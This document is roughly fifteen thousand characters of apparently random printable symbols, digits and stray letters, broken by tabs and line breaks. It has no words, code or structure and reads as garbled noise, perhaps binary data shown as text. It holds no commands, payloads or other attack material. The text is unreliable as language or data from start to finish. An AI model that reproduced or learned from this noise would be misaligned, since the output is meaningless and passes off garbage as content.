:3.',9+-,)*:,-{9!cD:%Z5l|S0>mN%8*.l2#!w7T#V	H(B&3 '},?Sg"$z+na:4| f:;Q73p?83,$8z,1<5<36*<_!$5'/fn:;%W4`<  ,aL -!'!&jiN04"<c>94<2(j&#V<=-/0>;.=53s$'d%?
#\;b(*5?]+$?.=:Y1!z3%<<=1oN=E8kT*1,A/7"#V37	~-z)'8-$+?8;$<
p%-,Zc>3~? L[!D*>G8/Y6_c 6	y)Qu(X :?	6&sB5Hqa26:L57c7{j%'#Y~:c(==7)-[0(9W>y_Wb@? *!Zg3e84%/$&"2+);6 7:'+!%/ #d=>#?=T213#58da?g3!=4DN+^4;0<1!s;`B$z)]9'+2A-8$1f9\?}s"2T/A)Ts,'H-Dz`!/U=?|+j|-%$@W, <L0*5z  D
  
,h9,8+5 ]g?)<1!#g]S!D>V}W=l8{W,ni46,om]'
~.J=#=#7 }n+1 V>4e"-+<('O!r)=1*W?~2T+&/X
b:$@,'[*$7ny*[/ 2R " %~<.%cY#&g<	6;>se0
Hw/RX=-`)'!<TN#5=WZ; ;.8$5-[30sdl a:.#4
1:
#"+)<"=(<6v;?.N_
^;QzWG5*6^ 4#9,66 	'A L`)><%'(s[C?S1|4,. 0|"pw~9(1:
?=	DcK>=d,xe`>J7[N#T5T$z#y<%_0+3J	5="P=-":%t
%;<#/%-A3
x\ +o  ,'#6^tNe-L </< c1}-38.BwP_6Z$	Um6
;<7%YPi= I$<>,j0f $"Vm x$ vplx{.{91<,f!<|}+"4"!/"j;.z>S/v! '  D=s3IZPfeSU4^
'8^7?
 y<5")3-^v-$*@=p$
++;><%i#}9e d09"k7*_#:(-z7D,)r3562xD?".\?&(^K"Y35/%?73(^':j'4:43Xo5+<tn
"{4@ &v4@s+)5ml}u+'<E 'l> &
A+B"!
oR#R.3)(8'"/6A)\?%(R>Lz &|/9< &;#,3
6a8*e06c++?/.e>4|,$.D%U67d)"'$&9i>5B*6 "9U$9A[&	6}\q%E(X5rp;@8$~-*.	T-(#/,`' "	Y`a3U/)\9
v 8s-r6J?9XV@XVZ#Ck(I"+5.k	78cD)p,=~ota#^=	<Vf=p;;|%)/>0ca*~x;
9VY "	l?&Y04
?0P> 2Z!P ,{L-%)b:1<.v5S26,7/Uy:8$ 25"	%/&x&	1eC'$/1+%e^9a$+&<$:r'*p:
?
/b&o@:8*a/Q<~*]9	d37"T3+94n:(+9%>A(<; z#l
=.<z.>X8#"o.Ir"4$y5.MG53(<1/J#(4%;*6(8a,gWr-''t'%.N)?54$0:#Y`
$"'(186?:!/n9j3n,Z"<<T2+&<(6r2B' 5%O
k&#\/e-^!<35s5-?:BbuZ6>*b1#|R|,3/+f5 -;1 1<=7*y!&0S%$OdV,$5l/?
/\ 7'3)# ;U"?''0t! x*#
T0=%^v ?,_6:|yjE`!8{`>[ S5>:2<s!>]3h	TO'w;QP4=!Sk6JT. "Q#lTa 	'920#1;	,uV)4+c+%!=6+5fE- 1mI}&//(9*!N682y5Vd!J%3E#[#*>2/8;1:7	 -%-24&iNJ3	~(, 3>2)/<T:`7w!6%;y*L(r2 01"u$?.^!**f>;:5+/Z f.Qe(*2o+U=)&" D=V?{%;=F)qr/>4$&>bm'v4#	=>>UfF\,$%p%_@E	<<ys,2*iJ2Vk0<  
X~c$-|T,))>g@Rrh=>*`|J #J' jj$97.1%eB!^04*-32|}+J1	O\3EA(/"iP y$D30 *32b(#X 1 `+s% 5! 
<^# +X6`KanqEy!<6A@)4-#6[&'2XWY09V*{"\}}:W0|2AQR	v6c-$/.'p*% .e $Gs!%2;5-j(e.0%5.'@Es
!
1,fjNF#rF] ;6 ^+$=*]1 ,3"S+%.Y4sEq?_5~(1?3/}%&&}dJ[z)}K(+@*)6?,E:0-4"$e Z0h<,?, E9'M8>5#?2#%<<4";W$ &2gh	snA&A ":m79,"@.#}"++D.T\/9TZs?TRh;*_85 4!%GUC%}HM"#"'.+$nm%	.t&h} 8%>9&4}&1V,-"87&, 1.ry<"-&4 %(|1\9C0j&]#I}#-&$.F00i7/	L*.	r
09"%7+2x"d!!K-r58&M!V'~3,)/z,IA4-G!@b  >0@#8u&V rn5($w4$75@3_"j=y"=j`#Y,&
6yrZS<;-^
(97#-+$]'wPWZ<70\ 
ERy?^!U)7;;:-*-!!r_erY*>0+>!2zz/;Y"/_T+*4*8*5\:(D="<?gY(=7[5T4?&4s?7	i&a#72|
511d<2e	<x|,7
&/e$(E*I+/&"%$x=,i4$^/9
H'&_z
- _2/f&ayH>j!;3
!;95 2,):d48$m0#?=7/N^&4!(61us's#.yI_)*6D=lQ+*{9I	+1W2%-*<:.s$2$Z~<4_
f>j)-&,#"3p8zd"2.	D(5D,
	Zz
 X,=AkQE #6&R)&1!#*0 =-Y=;)?=$g+Y cjmN	>>7dw2	*vg?6'AyT.h_!V0 i(6-
}Ze;.
VN9A3:X"Qu@-;j-'0MPa+)15>,d<6z  ??PFk? 0#|A#4~!3&7#"!7zH.r.#<
=y38- \&8'1  ?W#	"<6N2j("C%P,2	:"/L'& $ $."2<2 |d
  <2:I46G
>&*f5+KV|\\!~.f;$nZ2 '"60Rb?`6g*p/>+"*9?-,q?#&22(;*1.yB*}'6/IRl"#1M-4N>*S%3!k3_+%&" 4y:
uM.-Z*Wg_-*"3*`+76(!7@!j+?$A=6"<+:(u"A]4?B=.W3(=^\	A   + G*!4	F,M3-(Di	@U$l1y(|0
7!,Q=|&#$++	42#
,80[?>5u1 (#.'6h)J	+"Z2%2/!c"
E
 R 7;;,2:nZ-L&!*7j8#a%+6w#`yc+/ 4!x%rIX>.Z?|/<3+9#Z>5PY(%7	 !UM!!1 a3/:=06-	2|:3X<>	j-e&8GeJ.4q-&C2a2?&eU, ^vl7</,%r
3."<?
=(*6!2
.1:48_040#9>~7!*#<.t@%)3 2)| -2r,- 8(p#i{6d B1#3$#.;"]"8i4G) ?3bp '. '%#8y(
U pL},R r?VR5<44#*#'E
$ 02?}5
r3&<r>-3 ]  #2&	 3<M-49g5)80#',q)0 $5,:1G<
*5!3:%t"/%g	?|><&x$24,>#)y=y%5:j
+'A>X[='1~0;({$=5`s#'z"	,9!	 2"4d"w&{$+}+s )7,-&68{~a ;%-e"vEBA

a$:&1A
0&-(16~Y1|.?0/A o?s9+z.-5=y1=56Bv/x5[=a/>'J./,"0D7	9'WB+;&92?$(9)9E?e;;()k<VCly+?<"<m';$7+a,?#*l7-E),b%.%<$5E'"'5#L%y#_
.<"..# ?<b>;.*gt";1$5a$=	p;l*=~[;99|)!<P&9"z}4f>"  .>pyD?$&t0 U;;#~e']~59F+)_6-*1D='~![&+P5;Wj	6Q`{*v"&6*,?).r,|@23\&a ,xdbi2-{@*,:

7=s6$:`!3-".(	@ _1k
1Q%rTM|+D?W"/ypnET{-w'8 r4=?$D|' b?A2*<	1mh1'yD>P{4)3|M
2^) ' !X%(Z84>\"#|85A,P
N.u:Av3<o4>7)#2?98zM"z+#}')}'-=}N#Z!'$G:4?,U0
; q3i?+S9x|D(3r590v|ZLf&X61=- h~h}j8%1%1+_%v,M=$	z\Y	4&59Z1eR ]8gvL:Q,*'-]C-7$(1#2?5!*!l,@)8 w>	r;36>0	0'8fv'r= |`h).[z	?ix"r'$4W~ @
* 
/,/),6bc _M&p0^]+C:%y0v@' `42NeT?L|,b1	/:%E_v{3m16?@ +<I$:"N!<X5z0`4+#)Y7^?*coj("1q/9a"	0E.,?*g,+"0V-s8f&%
1<=34*3E&0#'7<l @r69yI;}5;W]Y#7+"')93$ <+Y'#t.C?0x+3e}?t71'	a2:D%/b ]cv!
fDe#~^,+'t
B 8b!/;# 	=/)c"l#% &4BM75g4$+;3b}X
)=$6=1<D5}2" oEb!ttd$!x<*z'O=(,I&Qw
4	\+5jW((Zd'0+}c7#|6w54? i'!0>r!N81	@xazt'c9	?>9o"<{ #<+8I @=<
12Q)-}(_>4F/,*"$+c	,  ~%Y/S$L".&<&e@17[eKA.5b<#80\9t?1
91'W.<.9)vA&(^%Zm!.0u)JCV$}R34w>Z`#e9  ()#?u6# 83~"	c8$39e/N(U{'C=B%','q*OBW"<=0:!~\4z 
M3Z+.%*f>@*Cz:*:$ `?+Rs5r1#;"| 	n0~=@|B6Wh "6-9s.(\{W;XZ>76Q"61#=-4-0iWcg;>L=1;8PRe |F  x0	_<%"< =,*4"749(|:;,:(/2F[ G2(?^<z3'2't[%'Ns?7%d /1A3;l"p+"/,8$,0 8X$76u1<}T
.?j9<# 2Y*); /7^6U468jV$f+-'(3{! ];
=8#8=;vb"*a Xd}=6(!!~~:+vF3)+S=m:*Q@XA3[>''y>_oq#=#!#V6)cZJ8r3([>/( }"$512bC	$\$d=5'.l0$t,>1}/4Yf&*Z2W> /#!.] #8&3 [G`r'4()3r w)*45A; <86#^g:<=fsD	.>7 ']69>
*< ,30eB5?594=")7(90#	:n$Q#7J7$.;3-w]cx 0<U~D5#l#6'9d`;.3?$Y|(0~'	b'<)(K^H\`$1+7!5#%#:L#4!	,#3B 
j&9=+O;a&) zyn"'&l0Bf=3?2J[# 
6=u2-*]*8#@* @#qO:)5) c;6H0M[$2pJ,ry	W5qV
7q$dh>2`>' 1t.|" ``:N#-4^% [^Q{M%2G8<!+/,(vSQ+?k %*&G+*y{F:#qI22_767V /6)"
=~%-9|h_n3.$0d,3# %5(|z'a@8"P1-?:_,
"a/=[].64 QP4>%S,55'"'&:V&c?\$r,8m;{?/i,$:`4~am:?.>#3.6.*8=x7/&anY;\0N ;)' (.57{<)!$&J|[`Y6")a(<i- &!%63d:1>:6;>;: N<8'h3N"%:	 +%~=@7-Xk9'Z6$'&g;!37+_q) 41?);rhzP >="ce}7#a8{y,-aeD *+G76=ZraVU 0~S7<\!+VC=W&&0 !M67R7U31sBdp~*24	=7'"]l3+/>4>-*1b +0z&(%Ql620!y,'Uf/E*-3]84ZYWQzD_64lW"\/%&31; "t	"!-._	2 n=c|/v 6+=^#)r* %=Ze_Rb>(^\7,?=6PiA`Gf?@#41Z5m-?&.3n{[7yt`v +w
=7_?=>31;$:pJ>* 2<5:0)5~ 1I&:u! 2')7:Y@Z#F87c	jt>
# <!3_u!/!49& ")[:.rT#!_>
=/61&71 C8)7/p0U%-~9 `
:&p(,O7./&\[V^*1l$>,dE *!DU# =;+
*u.	U"_6/hR'8TC|?05bvR ;]),&7v"}]---5U$,X%pZdQU#.#9%6.D_ )4<R?;3*<jU"'T&9%8*%!.w. 2+5V6/[%cl%|E<;1oK*x)Q 4*"&"rA/Wz71H/$C!$&G_[`+=&a=4M-Ss;n &$h4)	l?}}e Y. !|j$j5$y4C\9;I2
' 55
=8o>+0/_k6?B]7#k77 yj$>(S#)N<g,Rq,aA {=&-9R 9U!1Y %j]2 }=7;#rEy>-.<2 $8N<4'"Z 24?),!A$f<?<)G/-
x0 +t"1a7'<~6>:lj$\7>`8v6=< =_'2'(@17|<!.6+(3%"&(\$<2*S!):;S'*ZW(	#64tW46$1(Zyw% s"/6)
(0?5bf<s+na[(e2U!aYYx$(m{<-3_^.#4<Q+*-Zf#()	?D9V7/qt35!WJ
3B=,/"df	v$k(9+xw.*<)	B.3 ">1$ b1W@X#)f"9%I 
{C9!,r1''3Lv#%"
 (rsC5-		i(bsfQ4
/,x#q'9$\A52(Q-?9^*5/~A	87UPb7L-%1O$+C4$G'*	2/=&>5*-A'?U&s@~:*D``H
)* Ddj()]%%*zr" D=&.,{$%_? 03dr&!,5&5
Y$	2I9g@! '"<=$8=@15!D|m$i|%o4<7
(+12/=
#-%'$~Z56!IE >x?U5*'v.[Q'GT_,y15'_z-k<?!2X*:6"G
.=
241j4:'u	-#f)A68@!~?1%w'6<17 .`N,(5
,!%/68j<uI03? $135W+2!c/"c<,#93e71';'y*,*<7^ &25`,>W#/s9!*++3(1a}$&$	&\ Wdc"-y:?<6*7"sxG`#`||3[g5;9-'s[!1$z)lR">470gPU?"W;LV3.:8>$!8>*B;0,46!I-|^! "d:<4<$:22`bna/'0X=d%5=;Xr7H(	\848%g)+*.3 Q6"&"1%6Q3=+t5 o	Yu7"6$8+4e*7/H9#x  !6
X&%`%1h 0 ?<<<^;Q/R@r
>a+*)}2?WI(o5$3%UV"e[r7e61|[@;Y4@-.u=d8uX:'Q}N_k]3/g'&|%<8oU'X-/[fG4;@#.$0%~-.?r'aX5|yS;1V	~".xz9.Z~ c"=32+R0H~fm|#6]7X+`< +9;
+97Uw2O~0
<_,8;9	N(>0e5MQfx-I q,y!Qn:/`" `p'+  (r76l~}s5 ?-~.l!l%63
z`S51#;HX%?-Uf	Y@7&"/0/=^9a5g	;(274&g.:=5^p/2R=;G#4b2+flN#% +!@HP0#7i<	2'!,2'<#=Vh6-%-%:3b%@"
\Z)?Rv$-%6<*#!%=w4	,:6'v'(|"&5! E-!,F"&9B0	= .aP rO=Z5#'W1^c-.&}7gYC,%9:%>j?.a?R%3,*a,;8+5!
3,n2e7`.a8`N|(T.'&:I ]8Ara%?3.-7.><B'?~MfJ=3/14|Yr3t*0{
[z$2 (	0<5'AfD97a,/!0B'r6'<Zz*6E3`M'8v!Z.(&^&C/Xz>;"/#N";3)1wZ1%#-5",=(R0"	w*# 6y|%{.6)%.z?!++l :~E*)&	:,k[?)\'*f;?_f3+5"-(6
7. D
	8Uz0/514>!}(~287)2%'0#{y.a(F)U+9 l-4.
0	=$'>o*
.*?w'8&?0$;,#*G5R|.V/>,-s0$"*ov*3)e&$:A}7"`3;.`"'#va!
=O9N5(\<}4TB(W(./6?+aLc[TG%1n>7Mr1v/oYy!$j
2?""Z&<*8 0b#09r$=:X>}b7b8.aS7 Z12MA>/`x:}Q^b 	FMo1Cg-<G#f{:I's8.|351rg4&p9g<$:3d^a0eE9,!r82# 	}>"<5^?4.
  M/.%,4a1I;%Xk'3Z/cC6f:F?W3*Cr,x0|0./4n4?}<&b?1p;39##A$*yv?EV98rW47=Ci:;d N. _2XW87,*
G3"1<W3&};32<w/	
'38:r6J =,4!$,`r;.'
85'-	5? .8,M,=.=$8X+4/i4?&}K43"=&92 W ;.!%"?62}3'	Qq+8y0=&<]lz}; F%6r1)}4\x0;rP6!	( a >T))=\[1<e-Z }?2W"30 '2+n ? y~\6
0/=$8~,*s8f@0:j"=+#c4	%;89f@4-+/6#/
7r/ ?",~0(B;?]"/Gg:'P}b 0=*l_ ?1*P18w/o=
!.$$r !gd<39	E !-
.*:t7'0:4,,(9Y7]3)2? " *+ -5&$!(X^ ,n{$ 3`%>~*<#8Sk= <=>b<+6::+=U./@z20X!),U|`/(.Y."P9Xf41+' .z|!}\#*$u`67 &-8-, E6
*1A|=\yx7";8~ ^
$V.=6s<7[S;;-U #<
)2?u> 4;1	 Lf#&
9.,c[,2!4$21#.s)$	` j;d?d#>/ ]'x \Gpd4* >;$Vk?][> -+I9~"H e|U)1>y085k"Z+s}z7w}>"830(bbD_m;.O|V(__3N
>
d&<$!W
0XW'(/9
}<x8,v!
k&0;#&#
,?.*fq#?_92:A* <-~>%3;1!19$8]?S$N=$X2h48UZ%3&Qn6$7
}V}%;X -<{>,}05-7$&i(72==z?/$ D'+,cv	?&$\<El.$6; 4|	g=p~;:Z:}(/+%$I$?% %T_4Qj-0	n X$*n4).-b	3,>e5K!#j&
[)o9+{<$2'0}
f+*L*'V6@+7"!:C-"==	V0qW%lp2F*
@)7us|[/".#&j'&F!c,<*#6")6w4-\&_f$ 7'=!r0"+ 9T
(>
/_914.;(K	+<#
&4*(W!yS1?69L)4-?&24{_+Y a67\71A'}9adoIb'O6.%3uMBp|F:,B;A#$'3>&2fU>
"0 6#)X;nzZ<vt+1HxY);L=m=)?r=x%1 *.75XZ"},?e>2r' `.!}55&A:]gXI/}H#y	 -0\5)&,h4,Pqk1"~iW-O<8|`A	-g 8<E{.'v8>?'%\3r:5\/>%);UPP88'[/-r	70V$4%&gv1*< <=r./#;e7)a|~6(C/!}'Z0;?00#&
3)<\(7A_-2C+>Z#'+ <[%/p#[9Q2 -Y<..nt>Z8. rgaLM?60 4=$(jK,wmr9-<Y*?^ 4.<#C

*#h.3;>%=-C$XZz?Z'5E!p12g57V4'*y	sw$*[6?!*"V!%(2
"1l{=+)xXE
>	
|e- ~I%5	\`dxnMP8n-,;Y&:?72*z- (#%
o5$I'",|#1y40G(+)'_9</y_r<&@m
|j8+*do>e&(12/'&=+;F)r IFJ4j
,>+Y6$6<f1Z3Z11'7e|&4p3,Rq3Y{
$ `=$z<]zfrA)7:7,?1*r5^\+},%)/.i)<d.)/_2D'=/P t*91:<'%#s[B8Nn:-</<&LxgUj/=e?<5 ] 2j[x=d:? 1; R/1lSB 1;d|V3 ..4/"(+,30v#53!}&B8' :'n.<5!,(Dd
Ls .,5"f&$(,|g29`y.-f<>	@bZu 9!N;q2d%n4 =?=k8/i;;4Pe:0
 y"-)%\/>)5.V$--" ("8%
<34l8$d4&j!Vx{4 9"!0
^17.=-sd/< :BI5/Y?e6Ye9*#_#"?M5;76	Y$%/q=>4\".V{ =2=rx2)*%]w
f7?5],,ft Ev
?`|U	$.: 
J,"&'>9z=),* #j>%T,A@,;@67{/=.h<*:z%-NeD?.>=^A)8d>J
eY]Yb>.;>C!7s.$+A$9''6Y?'G3^
9d	'-7^$#a"[!	2+7['S
>6
<M6;br$=/ #0# (**-/qr&"(Y- *XD#\4Pa:8[V3v4'
|"A  %;={=p#3dT*}*}?<8#2	&=|=w}%l#z(?" &V':2
,.$<'M((8?D]!:;'[y!33 J&r c]4/h6ci*4 >r</R=<k]f|&3%!1BBDY;4'Ni38:#T,f>@NA'6*/9 c3	d3#$I+sS/A?
7Rq5/0L9_&z&!L6;:c0(q(x%;s%	.5'"I\]>=<f,zbn^#,$4&Q}%+=M Md(\5; 	9w>2
:4l)z#bK z"ud[`'a>	 #S>96	P7 _+66/;=?;f7!y*CZ<8#&U1	Bl2b
7q''{%. i.0?u.	("."y Ee >`|0g73
, _ @. hS9~y:2"#7,&;43-U':/&(,]0-
;34M2"F""|<[,(W7c@)
4j7Q	
dfv;0/Yb**u 9)]>4;|<&>qQ2| 1"U{7^>2+ gZ	, 'EC~kN&<# >8$?'
0>=r%6|4'$w;6E8,'>/aF	R[>=7%_'%7.L;,%T)f<"
rC(	'&GGg!'$T[c )&#z' /<:;+*v:8)4'['6+=?9n%{e7#5"50W)$yZe 2":"U>}N$X:c$.b7")&Q\#U+)<8(<s*>2*+P>F7vyu%A/vd+B,
$6{@4$`9s
/P5]q!;\ $,$2A6++/*D!avRD; Z7vR"?Rp?6.+/ =QoH;l(jjA+ :=J /1*("zUF@3,>d| !8WOX!$>7*1$=1#C/Q7u6 g"2s@wHg!6Rc{i"46@'`!]*$;?-f,r+>S%&YzIOu :>`n"	 9. %3F.84'*?9 #!7-2V	23.$}2l:^=U}mZ9!7z "=9'zbD5</r8rV/I )B<>48=/7i^9<}A("[6;(^?5;$4M
.W22(n$ a)~ars/=R86&37?a|		 &{#;f-02(B/8?1Bx<46[	f&+"*1Y%U$<t1&#$,Dz?P7YA6ec$	
7`3$nJ~&9G>73t]gD8vb6=]*;)\>2%>Cs`
\$55VW/	m-bx01?8QV3E4038.+wA$ ;v*/h+7:#7=G|a r8d1)7!vy?.Fh'l2:?.
d2_'.*>.VB,c45G44}K8u%)",-;?-;Wx@,6<d /?=*:|]f2  $2?`w::7>^s-{5%)Z.1qirZN> C%" 0c61?&,& z.0"%8()VJ .G" `)9
7TsIe) .<-c"AX#7&jN G1zJ\q0'(-!/
8;$'"/%fjK.,?-"`-8a+45 I#+&5@ &; V>.1gr.(!(-?#!j@&~`28+6
^,
 #!{,3_=,;;="A9#(P*U%#31Z0[ /k3">*;7,7!}c)iSrf7-+V9,s<|=)| v|.(5DV(((0@/B?F(>#
,	' "XZ_$7](( G:'+\$#u$ !",v	*854f21k1\`.a"qJ>$3(?%$r.`.T( 2<T-$X3 (-$BfI f  &^"W^$=3`#6N04
7{>s=!&;6'0$k$";;81];(x86"_<2
%3)nR

; @:U<'9]/)G&+%=g3$6[,.uAv)" 8=tn7:g45{2z|IS"%w=(*8W>``M2#,&pT{6?5.9
r	*$bkK1*,f:	`1#9.9B/R%>"L|1x:/<?.-2ds{jYg8W=;)7*<[!hI"Q7%`d ?5-"(Z.?1}>$;.='V0`!/"&s9
"q%`? -M|;E;3,E$
9|o$4#&0 &:F,d$#.fa>9/Q#[rN(4*	-]<g_[1u+I4T29W5cYqL{9
*Xhrb?0N&rA<?(	 8>y"#=( J+C$)0;20
B| ziOBU?v0
?%,;-8u(_#%u}N")$,-8t#+twL1<	(#8Qs<,L0Eg7;%+:0gU/R9 -f:/W5Am} 8?d86
"/9"-+)$#31 +=1$!^r-bu"+x.o1`-	&@36>'\1;$8+vzz">74'4!D%	Zr<,=">	;A%+)0~3!)2%%w+{&70/1(.sq#"*?`@~r['B?2]57?<4{nN*;-23&6~'ZbJ?lT	>%]&\;"I^kgY@ ''Z0}<!V3nN#/"'9%`"&?I(V0766e&R`fWw
7>8-1]eR.0u1 
Cr"]&8 @UV 0/)h-f
.b[e?Q' #
Mc6@
+[;0Z2|k }=(3%%:!9y0-)&	!@<_$V.<>9

.>#]8W&L9 1WEV%	0I'!}-E/m/z	(z#d"/-2yaH0~&[ 9&y#g7/`w$ 
<!&	V(w'&C]
6`x"7(%f5@!r?%6#4&1V ~j%%c_&t7+$
~ K.#+5g4{}+5dA-95`mjJ!"]3	3H90*>."."e',*?/;.!4 =\%`Y z:#U( D7?Gj,! !]ti^,{?sVH)>J!	y
$<<x,#(+;Z(
MN8rg^*9/4[6(,0`+G0/P'3 XZ1<[
	6[	?Rix)qss4.G`4q	 !z; m;_,X7+Q76?Nt=
W6ZAo^; #""
;;9.q?3p[a#c<X;174,L31&^6==L #/+2.j`J<5-<Y )$.8-'S7)?=/(,\z.788-6(Z&2m'4*

+#815Q/>7}+(j932x4 V Q959-#y)4w:m
<q$Gs@y2%1 (?/f	Qz;@= CQ+&)4Y>4~][  G3"4Q/;Xe6
R3a$	}?v>rb':(H:9`%&bS?8!8,7i3p7Z.4,9 4 
VA~4%nf3n?F3!/5\Y*G3Z['/7z5[W&#)'>Q1%h>.}7"!,	V"h#!btq$b=>
 N8!>"r2"229x-#7?hn.. 	%E`<y8C>pRL'$Y3/S&(<$)6^6y!' aM2l3:j`C#b<,%y+H/,%? #d81	=.3H@*kN;6z(6+=S3V5'WD1(7.+P0h6)i#(.#/5%Aa$2q;E/4l>"XN9	Q
6$d{>"4&x=$=*B^,* $=8]H!.=26Q4AM'n:@$ Zd!"{d'' UY{#/p3
B#yy3B3@<*x!5Qv1Xmd)ZNb#oW:!Zk\XG'$Gf*[M1 Dm$qUrZ.Rb.	**4??6>)<x 0;+4	^=.-E84-9Bw"^ 04%]!7i	?+(>0!&{=8nM?`?33:7-9#{9!"~aXf%6L1,"fmbt00	0 7: YA+_!:"T. #9 P%3") !;|U='|W 9C#y=7(-um,w47	?& 	,&EmfY49G\	$/<?r^z/!5=0Z9{'Uin.^5_7,R25,95&6Q`R(72l 4J"9m~
Z!d(>,/ [eY(bn" ;1]6&&]9*!>*p 1@1sr1 'y;,	8kN'4	Q?{%IW'A<*n6<?}@R$6/	+"/>&6i3 E$Yv+='?w9&.a	s/ "8$$:B}@|	.$#,W/?Q~;UC)"7E,-#L,W7**,o/)x9	54jw
&2?_93=+4">/3f-;:?'.f{t/4] =,{< !$9_#-<i4U?<c3"M ';$I&Q	 (#5] <Z>w\d84.,S%0/#:):8?%W>6?"6t"
%MBR>+<% |D^P04^y6BR55&j* ::27{w&--1.gV	w->& 1d7;4A#>,3N(0'$.,/r9<
y]3;.*q! !\'0[
;AI5y&&%2&? u5p,(4g9?H6a,Kgg}c'-5
/!/9$@V&x%w$tm ` FR%/:M-/"_# 9 ~$j3 M0}86 Rq/4ab?w'&xr.(#2,50.a3'^$e"v={ 7%5t5@ 9@. 6F-<ca>K6E_#""R$!{=C% $2&Nq/Z<&=/v,=d{j#\g Pr7(S-2?j,<=&@/v-}4<9}5Y,.-"Y?rL #*?8	@9+'\! *%(Q,}#y2 A"P2<8 VJn	p	=a5-D9D.31z3$ 3>:W^!(4@1	}Q#R:7!O,"G>?+cA2M -%`U5766>Ru >/jR&52D2J3
#$Zb)5.r;,DJ<;0^36F58dd81B$+  6 ?/[^65MY>D_&a} '\}:$5}c6zlB&!7!&~&j"*>5p3*k"-9}l67	,3.7t/,1>7%	G}#,J>#*"B!u&P^ i2-'gM,#6Iu\.%Tr4B",' dy >6!5$9!g0'SE|b%b]Z9>2 v@:)3<.`0>(
c,	"0-$/+3#TV!#>!!1-' R7//$V.y:5G 
;:~6,@"&-?wg&%|#n"f#=7;C*"I:'-
z1#B],`0!L6-+	2%(5	%?S	7C.y;1x0	h(
i 9P	k+G$1.?v+6&x6. H??{-
(^U)'YC|d "fa10^QkE^EX~//<4{;3_!7124Ev(u7	=-"	s*)d&!87a3 .&7E*9?e&>9'6
4|<R*&"KW,
=.^Qg%""-9	g7
V4*a7-q/a5$/$97		)=4V:(!"xM?,t<E5$ !; .6qG"6?Z6tI0!> M <vT#\8\*L$. <y}2C1 
^m 6Y4/"
s$).$!8H~50"jA/y18{5_eR_06$'Yi
$#
$ 1_;.* $ C4&(6G23 'k <V!+>52!70-h)i
a"z.#)`&*w> c`5>4.{-=('B?,2<r-4fh!=[MVAO=/'}:B1nM #Z."4&%l/7$"?<D'	g2Vs_,#39b|<u?-y`n7=>XW=>BQ2RA6M+k6$8+w ?<'X _;J859|# 0<Mv3t@]{H\xz	1+!kC2%4($#6	/7/#+ 3e:~ WIt7:D=4=``/[V>5);&}^+5D;V 1 M$$/ 	)?X7N8+\	-w"d6w_`%.wV{Pe>]{14:`\&:}y:;( 9T^z0Pw\YM|8,>V!g IM?VX:9$9[5:<G0,I2#0sj^<66V5=&*1%)%2sV$k3 =<3] 88]``. +eN)N!{9)!G<d'|?')aK
;.A +XB!C)%'3: I|- L$c'3 h%*&.D(,Qe|{m!+2x7>+}&8P%!^1S0,"B=,{VJ8$+Nt; _#J=R3, z'-* >*c:Q
t/A`(/	s& sH0r;86z:qZ|?/)%c1nqF!}4>8%6(Z}7B\,`	S[	'= ,C&U+Z{3S}}UMPq<4-oNWP
!^,,5/##L=aD5#.
2|6+	b<Q>zNa\~21hQ?d=>o.#A#V!%()732Y[#|+4/ZDz?R Cr/~D(ls?*w=c>92
$'f <o;}F}!W,361 3X,3!n);69\1Fz)PC77z
I=?;5;It "R6VG#":*>8f/<A,L C3`qn5J*x0l-9 J?r_!q>^}l7Y-W (8'S'y4t* &<oJ7
\U2Z4"	g;"!".8>?"-'nE01])>Mp=Y(22+q q_O>^2I87|&r?"k
YP5$`5/8y'Q&7c.)\s/80{+$t	Z
g=#4f7rV&	%B5&|EdD	<9,1*6;<%}q^{X]*}|d3],7<A,%|Y/G=m	$({+>>#?Tfv
:A<x ,hZ}q=3--`M <"@61 5 fy*;V$
'#E<d*
g>.(W36*A.%AlQZ,~DuM'I#U*-8g+=-U`~a&JH<6t.+5XZv)&bl;{_ -qZ2 6Ft
=M, zI!)76/F^'4
% C_ZML'	Q%1$7567! -	s.89384>	5E0Ay|!'i|-!X>0{} ^=4"	+>#/	 (G![<
4	>*&V0V		.~\'994.co$8)z51)8*r8
6 bqSv<3.	:= '$6p>0d4 	5]"Z5^Z3-PZ7!5:)FzV"7lV3+h?2+ %>'$"=:g/ 1)=1C*,V_! 3
+:43,78
+%J 9<2-2-/h4/	7,u0<I%#	WM1y
?&	=S/*&; 09'g0|?'6%
=5{a"?W@91-32D|	"?v5 _2*V[`,"W4;YC
7?M&1?/
>$n$@d+`>d~26<5c6& ;D=$
F,r,>$>X D;&Vy`H*@Q%i'X?H!3<( +<;>,9)S+ 	{0S>=B83fz):aa\&!d3169f>.?e4!z3
)sd$8'f 9, XV!ZF#7.,"DI[$s$Y,u[rz?"2,'8T/V(&*6: #\
e>dd&.	2X<.8 %%E,;~d'>"=:9,+;:6!Z G!+4K=,vfkJ)XZ	}c?n <!"?#d& #=?xc=)@]'$%r+;6?B'9R60/3"I,\;)(;:CW&A_%;C1'v83-*Ma"3 Uv%?9?>e0*	oV.?d5#S5|=&=2&58;#$@z?t"6N M/,UJq!!<*6-,U)tZ&$"-sn,"r,t,  yw=e&42,	D1?c'< k ,>x."l7xz#U@+4#.O q|.8':5	A3 Wr#7R><8c2	a#[<1066L2*<rr#$$ ++|!!s"C#-xv]jd0; ;?"$X/"71<'}T($%;
6V<4(, 1z!.5:5+e-[zM>5=XL7b9?< F(2	#1h&,66!:'/S4^*8j2y73"R.9 '5D84
(._,$<,8&t6(7+g4="G*1Q!?7mQ3)u\85g-6!j?0?)"i<~&$s:rT=D?CE80>{% r7& \;+6+Q>6$!;#ZQh,I7 kF( *5-Z4[b7)e#6e*3$ 1S,44 % "!*rb55-8_9:=b	~|	6&^vx"Be%8q0t7#0,G
	I?\/B(!^/E$%~U,#y*( !+T*8*;'.6	/5!	67.",$ w{&?}=4d|9'9
.N.z#Z.'>Ni;|rP'=!WBOX?10E$
>,+91%4j% &#;/>)e~!/<21 21y7"9`r;p] \V
mk.\$@CC r}92"= `9Aq@$&X)=Q8;t'='
<g)k0?*6R5;1	:
?(aA	sL#A,!8, >  0$.HVs'?!#34'6+9 m%W8b+K@+,7%Y4 "+ ,`B xiZe=7&ec(
<>9$$:>,r7.> {!V4@F1.z(d
;^#O8, "_156YI,	RQ6$	Fv?.)v* !$R) &?&ME8|BVve./
56W<
V.sd%)*WI<%3=&!=.P?I n#&'1 $'4<5	=8izH0<&5=1
7:YX9$&~As  B7,'?Rz>K C: 1BY7'c\0|%$`5DI.r!3 !.'	+77`;=i#&s 67 _5l8|>$&x9#p?/~"3t$,)6&p?!%%M+
4vI$X8	V)A-I#8tA[5W,?!!
